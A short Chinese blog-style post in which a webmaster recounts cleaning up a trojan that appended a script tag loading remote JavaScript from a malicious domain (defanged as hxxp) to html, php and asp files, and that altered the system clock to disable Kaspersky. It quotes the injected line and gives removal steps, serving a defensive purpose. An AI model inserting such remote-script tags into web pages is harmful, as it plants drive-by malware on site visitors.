做了这么长时间网站,大部分时间是帮助别人在查病毒,这次自己第一次中彩。
暂时称为51yes1。com病毒,这个病毒会在后缀为html htm php asp 的文件末尾加入下面这一句话
<script language=javascript src=hxxp://www.51yes1.com/b/n.js></script>
其中的http改为了hxxp
是调用放在这个51yes1。com网站里js木马。
这个木马特征:
网页浏览时,在后台先加载一个时间病毒,把系统时间修改为2001年某月某日,卡巴的授权就出问题了,卡巴失效,提示授权过期,请够买正版什么的。卡巴的小三角有红色变为灰色。
但是看授权时间是到07年二月分。
知道自己中彩了。
先是cmd,输入date命令,按提示更改年份为2007。
下面是在一些盘下查找html php asp 为后缀的文件,打开后可以看见文件的最后被加了一个js尾巴。右键属性看文件的修改时间,类似于2001年12月27日, 18:56:33
到每个盘下搜索修改时间在2001 12 26 2007 12 08之间(一个区间,包含27号)的htm php asp 文件,找到后删除。
如果你会用批量替换字段软件 ,也可以把它替换掉就不用删除了。剩下就是将卡巴升到最新,重启,安全模式全盘杀毒。
51yes1。com这个网站是挺恶人的,许多马都是挂在他那里。
